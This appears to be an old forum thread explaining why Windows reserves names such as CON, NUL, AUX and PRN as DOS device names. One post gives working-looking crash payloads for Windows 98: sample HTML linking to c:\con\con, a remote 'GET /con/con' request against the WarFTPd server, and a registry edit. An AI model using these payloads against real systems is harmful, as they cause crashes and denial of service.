I observed something weird. Windows doesn't allow to create a folder with the name 'con'. It cribs "The filename you specified is invalid or too long. Specify a different filename". Any idea why? Sudharsan [ September 30, 2003: Message edited by: Sudharsan G'rajan ]
Not only 'con', Windows wont let you create folders with names like 'aux', 'nul' etc either. I don't exactly know why, but I guess it has something to do with ftp or other services misunderstanding these folders as devices (for example 'con' is the default device name for console) HTH, Ashok. [ September 30, 2003: Message edited by: Ashok Mash ]
con, aux and prn stand for 'console', 'auxiliary' and 'printer' and stand for output devices. Leftovers from DOS where you could do 'copy con a.txt' and get whatever you typed in a textfile. Or 'copy a.txt prn' to send it to the first printer (if installed). Actually, those still work (at least con does) from a Windows command prompt to this day.
NUL, AUX, CON, COM1-4, LPT1-3, and PRN are reserved words used for DOS Devices
These are specified in IO.SYS and date back from the early MS Dos days. Here is a brief list:
CLOCK$ - System clock CON - Console; combination of keyboard and screen to handle input and output AUX or COM1 - First serial communicationport COMn - Second, Third, ... communicationport LPT1 or PRN - First parallel port NUL - Dummy port, or the "null device" which we all know under Linux as /dev/null. CONFIG$ - Unknown
1. Embedding image tags in HTML pages, with an image path referring to [drive]:\con\con or [drive]:\nul\nul. This will crash Windows 98 when viewing this HTML (tested on Microsoft Outlook and Eudora Pro 4.2 - Netscape Messenger to be invulnerable to this exploit).
Example: <HTML> <BODY> <A HREF="c:\con\con">crashing IE</A> <!-- or nul\nul, clock$\clock$ --> <!-- or aux\aux, config$\config$ --> </BODY> </HTML>
2. Using GET /con/con or GET /nul/nul under WarFTPd on the root directory will also crash the operating system. Other FTP daemons have not been tested. This allows the remote exploitation of this vulnerability.
3. Modifying [HKEY_LOCAL_MACHINE\Software\CLASSES\exefile\shell\open] to the value: c:\con\con "%1" %* or c:\nul\nul "%1" %* will crash the system.
4. Creating a HTML page with IMG tags or HREF tags referring to the local "nul" path or the "con" path will crash the system when viewing the HTML file.
Example: <HTML> <BODY> <IMG SRC="c:\con\con"> <!-- or nul\nul, clock$\clock$ --> <!-- or aux\aux, config$\config$ --> </BODY> </HTML>
The story I heard was that there was a bug in DOS release 2. Devices were supposed to be indicated by devicename, colon, device properties (optional). However, due to a bug, the colon become, ahem, "optional". And a lot of people abused the option and there was no going back.
What's bad about that, is that one day I discovered a file named "PRN" in a directory and Windows wouldn't let it be deleted. It was there polluting the directory forever after.
"privilege" comes from the Latin words for "private" and "law" (legal) and dates to feudal times. To "claim privilege" meant that you were above the laws that applied to the common people.
There is no greater crime than stealing somebody's best friend. I miss you tiny ad:
Devious Experiments for a Truly Passive Greenhouse!